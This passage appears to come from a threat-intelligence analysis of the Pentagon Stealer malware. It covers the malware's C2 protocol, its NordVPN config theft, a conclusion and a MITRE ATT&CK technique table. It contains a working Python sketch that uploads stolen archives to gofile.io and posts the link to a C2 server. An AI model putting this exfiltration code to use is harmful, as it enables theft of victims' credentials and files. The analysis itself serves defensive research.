The communication protocol with the C2 server is also noteworthy. The stealer does not send files directly; instead, it uploads them to gofile.io and then sends the access link to http[:]//<ip>/tgproxy/{USERID}/.
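The flow can be sketched as follows. Note that the gofile.io endpoint shown is the legacy one commonly seen in such samples and may not match the current public API, and the C2 path simply mirrors the defanged pattern above; treat both as assumptions.

```python
# Illustrative sketch of the BLX exfiltration flow: upload an archive to gofile.io,
# then hand only the resulting link to the C2. Endpoint and C2 pattern are assumptions.
import requests

def exfiltrate(archive_path: str, c2_base: str, user_id: str) -> None:
    with open(archive_path, "rb") as f:
        upload = requests.post(
            "https://store1.gofile.io/uploadFile",  # assumed/legacy endpoint
            files={"file": f},
            timeout=30,
        ).json()
    link = upload["data"]["downloadPage"]
    # Send only the download link to the C2 (http://<ip>/tgproxy/{USERID}/ in the article).
    requests.post(f"{c2_base}/tgproxy/{user_id}/", json={"link": link}, timeout=10)
```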
Image 28. Example of C2 communication
We also discovered a sample with the capability to steal NordVPN configuration files (user.config).
Conclusion
Pentagon Stealer cannot be considered malware capable of complex targeted attacks due to its simplicity. Its development history shows that authors often merely changed the domain, leaving the functionality intact. However, a year has passed since its first mention, and it has undergone modifications, with the most significant changes occurring this year. The story is far from over, as new, more complex versions continue to emerge, albeit from different authors.
IOCs and TTPs
MITRE ATT&CK
Tactic | Technique | Description
TA0002: Execution | T1059.001: Command and Scripting Interpreter: PowerShell | Disables Microsoft Defender scanning of drive C: in the Python version
TA0002: Execution | T1059.003: Command and Scripting Interpreter: Windows Command Shell | Executes a .bat file to download the next stage in the Python version
TA0002: Execution | T1059.005: Command and Scripting Interpreter: Visual Basic | Launches a .vbs script to escalate privileges in the Python version
TA0005: Defense Evasion | T1140: Deobfuscate/Decode Files or Information | Decrypts Python stages using Fernet
TA0006: Credential Access | T1555.003: Credentials from Web Browsers | Steals passwords from various browsers
TA0006: Credential Access | T1539: Steal Web Session Cookie | Steals cookies from various browsers
TA0009: Collection | T1005: Data from Local System | Collects files with specific names and extensions from user directories
TA0011: Command and Control | T1071.001: Application Layer Protocol: Web Protocols | Sends collected data to the command server
TA0011: Command and Control | T1659: Content Injection | Injects custom JavaScript code into cryptocurrency management software
TA0040: Impact | T1657: Financial Theft | Steals credentials from cryptocurrency management software